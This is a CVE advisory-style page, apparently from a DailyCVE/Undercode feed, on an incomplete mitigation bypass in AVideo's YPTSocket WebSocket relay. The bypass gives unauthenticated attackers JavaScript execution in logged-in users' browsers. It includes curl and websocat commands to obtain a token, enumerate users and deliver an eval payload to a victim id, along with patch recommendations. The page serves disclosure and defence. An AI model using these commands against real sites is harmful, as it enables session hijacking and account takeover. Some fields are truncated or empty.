AVideo YPTSocket, Incomplete Mitigation Bypass, GHSA-gph2-j4c9-vhhr (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The prior fix for GHSA-gph2-j4c9-vhhr stripped autoEvalCodeOnHTML only from $json[‘msg’] when that field is an array. However, the WebSocket relay function msgToResourceId() prioritizes $msg[‘json’] over $msg[‘msg’] when constructing the outbound message. An unauthenticated attacker first requests a WebSocket token from /plugin/YPTSocket/getWebSocket.json.php – no authentication required. The token grants a browser‑mode connection (sentFrom=’browser’, isCommandLineInterface=0). The attacker connects to wss://target:2053 with that token. They send a JSON message shaped as {“msg”: “x”, “json”: {“autoEvalCodeOnHTML”: “alert(1)”}, “to_users_id”: }. Because $json[‘msg’] is a scalar string “x”, the conditional if (is_array($json[‘msg’] ?? null)) evaluates to false – the stripping code is completely bypassed. The relay then sees !empty($msg[‘json’]) and assigns $obj[‘msg’] = $msg[‘json’], carrying the malicious autoEvalCodeOnHTML verbatim. The msgToUsers_id() function uses the attacker‑supplied to_users_id to deliver the message to any logged‑in user with an active tab. On the client side, plugin/YPTSocket/script.js:573‑575 calls eval(json.msg.autoEvalCodeOnHTML), executing arbitrary JavaScript in the victim’s origin. The same token can enumerate active users via getClientsList, allowing mass exploitation.

DailyCVE form:

Platform: AVideo YPTSocket
Version: Commit c08694bf6
Vulnerability: Unauthenticated XSS via
Severity: Critical
date: 2026-05-05

Prediction: Patch within 30d

What Undercode Say:

Enumerate active users (unauthenticated)
curl -sk 'https://target/plugin/YPTSocket/getWebSocket.json.php' | jq -r '.webSocketToken'
TOKEN="<extracted_token>"
echo '{"msg":"getClientsList","webSocketToken":"'$TOKEN'"}' | websocat -n wss://target:2053?webSocketToken=$TOKEN\&isCommandLine=0
Exploit delivery to victim_id=2
echo '{"msg":"x","json":{"autoEvalCodeOnHTML":"alert(document.domain)"},"to_users_id":2,"webSocketToken":"'$TOKEN'"}' | websocat -n wss://target:2053?webSocketToken=$TOKEN\&isCommandLine=0

Exploit:

1. GET /plugin/YPTSocket/getWebSocket.json.php → obtain token.

2. WebSocket connect with token & isCommandLine=0.

3. Send payload: {“msg”:”x”, “json”:{“autoEvalCodeOnHTML”:”“}, “to_users_id”:, “webSocketToken”:}.

4. Victim’s browser executes eval() on autoEvalCodeOnHTML.

Protection from this CVE

  • Patch Message.php and MessageSQLiteV2.php: strip autoEvalCodeOnHTML from both $json[‘msg’] and $json[‘json’] recursively, plus top‑level.
  • Remove eval() in script.js or gate behind a signed server field.
  • Authenticate WebSocket token issuance and validate to_users_id against sender’s session.

Impact

  • Unauthenticated RCE‑like XSS in any logged‑in user’s session (admin included).
  • Full account takeover, session exfiltration, and arbitrary admin actions via same‑origin XHR.
  • Mass compromise using getClientsList enumeration.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top